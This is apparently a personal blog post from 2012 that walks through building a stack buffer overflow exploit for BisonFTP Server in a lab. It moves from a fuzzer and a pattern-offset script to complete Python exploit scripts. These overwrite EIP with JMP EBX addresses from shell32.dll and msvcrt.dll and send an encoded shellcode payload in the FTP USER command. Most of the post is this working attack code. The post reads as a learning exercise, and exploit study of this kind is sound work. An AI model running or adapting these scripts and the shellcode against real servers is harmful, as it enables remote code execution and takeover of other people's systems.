Tuesday, October 09, 2012

Buffer overflow Exploit BisonFTP Server

first try to make a fuzzer to make the application crash

#!/usr/bin/python
import socket
import time
s=socket.socket (socket.AF_INET,socket.SOCK_STREAM)
s.connect (('192.168.56.101', 21))
data= s.recv(1024)
time.sleep(4)
buffer="\x41"*1500
print("sending ... ")
s.send(buffer+ '\r\n')
data= s.recv(1024)
print("Finish")
s.close()


then, try to run it again with ollydbg



we can see that the EIP and the EBX were successfully overwriten by our fuzzer.
next step, try to find out the offset. first crete 1500 pattern and copy it into our fuzzer.



#!/usr/bin/python
import socket
import time
s=socket.socket (socket.AF_INET,socket.SOCK_STREAM)
s.connect (('192.168.56.101', 21))
data= s.recv(1024)
time.sleep(4)
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9"
print("sending ... ")
s.send('USER '+buffer+ '\r\n')
data= s.recv(1024)
print("Finish")
s.close()


then search the offset



next step, try to control the EIP



search the module to find out the jmp ebx. why we need jump to EBX ?? because the buffer (AAAA) was placed into ebx. when the jmp ebx instruction will be execute, the controll will be move to ebx and start to execute our payload.
first search the module. here i try to use module shell32.dll


then, search the jmp ebx. press ctrl + f and type jmp ebx


and we got the address



next step, make payload

#!/usr/bin/python
import socket
import time
s=socket.socket (socket.AF_INET,socket.SOCK_STREAM)
buffer="\x90"*1063
s.connect (('192.168.56.101', 21))
data= s.recv(1024)
time.sleep(4)
buffer+="\x8F\xE8\xB1\x7C" #7CB1E88F   FFE3             JMP EBX module shell32.dll
payload=("\xdd\xc0\xba\xbc\x07\x7b\xdf\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x51"
"\x31\x56\x17\x83\xee\xfc\x03\xea\x14\x99\x2a\xee\x71\xb6\x98\xe6"
"\x7f\xb7\xdc\x09\x1f\xc3\x4f\xd1\xc4\x58\xca\x25\x8e\x23\xd0\x2d"
"\x91\x34\x51\x82\x89\x41\x39\x3c\xab\xbe\x8f\xb7\x9f\xcb\x11\x29"
"\xee\x0b\x88\x19\x95\x4c\xdf\x66\x57\x86\x2d\x69\x95\xfc\xda\x52"
"\x4d\x27\x0b\xd1\x88\xac\x14\x3d\x52\x58\xcc\xb6\x58\xd5\x9a\x97"
"\x7c\xe8\x77\x24\x51\x61\x0e\x46\x8d\x69\x70\x55\xfc\x4a\x16\xd2"
"\xbc\x5c\x5c\xa4\x4e\x16\x12\x38\xe2\xa3\x93\x48\xa2\xdb\x9d\x06"
"\x54\xf0\xf2\x69\xbe\x6e\xa0\xf3\x57\x5c\x74\x93\xd0\xd1\x4a\x3c"
"\x4b\xe9\x7b\xaa\xb8\xf8\x80\x11\x6f\xfc\xaf\x3a\x06\xe7\x36\x45"
"\xf5\xe0\xb4\x10\x6c\xf3\x47\x4a\x18\x2a\xbe\x9f\x74\x9b\x3e\x89"
"\xd4\x77\x92\x66\x88\x34\x47\xcb\x7d\x44\xb7\xad\xe9\xab\x64\x57"
"\xb9\x42\x75\x02\x55\xf1\x6c\x5c\x61\xae\x6f\x4a\x07\x41\xc1\x27"
"\x27\xb1\x89\x63\x7a\x1c\xa3\x3c\x7a\xb7\x60\x97\x7b\xe8\xef\xf2"
"\xcd\x8f\xb9\xab\x32\x59\x69\x07\x99\x33\x75\x77\xb2\xd4\x6e\x0e"
"\x73\x5d\x26\x0f\xad\xcb\x37\x3f\x34\x9e\xa3\xd9\xd1\x3d\x41\xac"
"\xc7\xa8\xc9\xf7\x2e\xe1\x63\xe0\x5b\xbd\xfa\x0c\xaa\xfd\x0e\x7a"
"\x33\xbf\xdd\x84\x8e\x6c\x8d\xf5\x75\x55\x1a\xae\x21\xcd\x2e\x4e"
"\x86\x18\x30\xdb\xad\xdb\x18\x78\x79\x76\xf4\x2f\xd4\x1c\xf7\x9e"
"\x87\xb5\xa6\xdf\xf8\x5e\xe4\xc6\xfc\x50\xa5\x07\x28\x06\xb5\x08"
"\xe2\x28\x99\x7d\x5a\x2b\x99\x45\x01\x2c\x48\x17\x35\x02\x1d\xe9"
"\x11\x41\xad\x46\x5d\x50\xad\xb8")
#buffer+="\xCC"*(1500-len(buffer))
print("sending ... ")
s.send('USER '+buffer+payload+ '\r\n')
data= s.recv(1024)
print("Finish")
s.close()


and i try to run without ollydbg


but i can't access the system using telnet. so i try to run it again using ollydbg and i got the result like this


here we can see that our payload can't landing fully. so we have to use egghunter.

but i try to change the module. here i try to use module msvcrt.dll. I guest, the module can't leads to execute our payload. (that's my oppinion)



#!/usr/bin/python
import socket
import time
s=socket.socket (socket.AF_INET,socket.SOCK_STREAM)

s.connect (('192.168.56.101', 21))
data= s.recv(1024)
time.sleep(4)

buffer="\x90"*1063
#buffer+="\x8F\xE8\xB1\x7C" #7CB1E88F   FFE3             JMP EBX module shell32.dll
buffer+="\x13\x1F\xC1\x77" #msvcrt.dll
buffer+="\x90"*16
payload=("\xdd\xc0\xba\xbc\x07\x7b\xdf\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x51"
"\x31\x56\x17\x83\xee\xfc\x03\xea\x14\x99\x2a\xee\x71\xb6\x98\xe6"
"\x7f\xb7\xdc\x09\x1f\xc3\x4f\xd1\xc4\x58\xca\x25\x8e\x23\xd0\x2d"
"\x91\x34\x51\x82\x89\x41\x39\x3c\xab\xbe\x8f\xb7\x9f\xcb\x11\x29"
"\xee\x0b\x88\x19\x95\x4c\xdf\x66\x57\x86\x2d\x69\x95\xfc\xda\x52"
"\x4d\x27\x0b\xd1\x88\xac\x14\x3d\x52\x58\xcc\xb6\x58\xd5\x9a\x97"
"\x7c\xe8\x77\x24\x51\x61\x0e\x46\x8d\x69\x70\x55\xfc\x4a\x16\xd2"
"\xbc\x5c\x5c\xa4\x4e\x16\x12\x38\xe2\xa3\x93\x48\xa2\xdb\x9d\x06"
"\x54\xf0\xf2\x69\xbe\x6e\xa0\xf3\x57\x5c\x74\x93\xd0\xd1\x4a\x3c"
"\x4b\xe9\x7b\xaa\xb8\xf8\x80\x11\x6f\xfc\xaf\x3a\x06\xe7\x36\x45"
"\xf5\xe0\xb4\x10\x6c\xf3\x47\x4a\x18\x2a\xbe\x9f\x74\x9b\x3e\x89"
"\xd4\x77\x92\x66\x88\x34\x47\xcb\x7d\x44\xb7\xad\xe9\xab\x64\x57"
"\xb9\x42\x75\x02\x55\xf1\x6c\x5c\x61\xae\x6f\x4a\x07\x41\xc1\x27"
"\x27\xb1\x89\x63\x7a\x1c\xa3\x3c\x7a\xb7\x60\x97\x7b\xe8\xef\xf2"
"\xcd\x8f\xb9\xab\x32\x59\x69\x07\x99\x33\x75\x77\xb2\xd4\x6e\x0e"
"\x73\x5d\x26\x0f\xad\xcb\x37\x3f\x34\x9e\xa3\xd9\xd1\x3d\x41\xac"
"\xc7\xa8\xc9\xf7\x2e\xe1\x63\xe0\x5b\xbd\xfa\x0c\xaa\xfd\x0e\x7a"
"\x33\xbf\xdd\x84\x8e\x6c\x8d\xf5\x75\x55\x1a\xae\x21\xcd\x2e\x4e"
"\x86\x18\x30\xdb\xad\xdb\x18\x78\x79\x76\xf4\x2f\xd4\x1c\xf7\x9e"
"\x87\xb5\xa6\xdf\xf8\x5e\xe4\xc6\xfc\x50\xa5\x07\x28\x06\xb5\x08"
"\xe2\x28\x99\x7d\x5a\x2b\x99\x45\x01\x2c\x48\x17\x35\x02\x1d\xe9"
"\x11\x41\xad\x46\x5d\x50\xad\xb8")
#buffer+="\xCC"*(1500-len(buffer))
print("sending ... ")
s.send('USER '+buffer+payload+ '\r\n')
data= s.recv(1024)
print("Finish")
s.close()

and i got the results like this....


Alhamdulillah.... :D

Posted by at

1 comment:

  1. WarLord26 November 2015 at 3:12 pm

    Do you have the software available for download? Can you provide a link please?

    ReplyDelete

Subscribe to: Post Comments (Atom)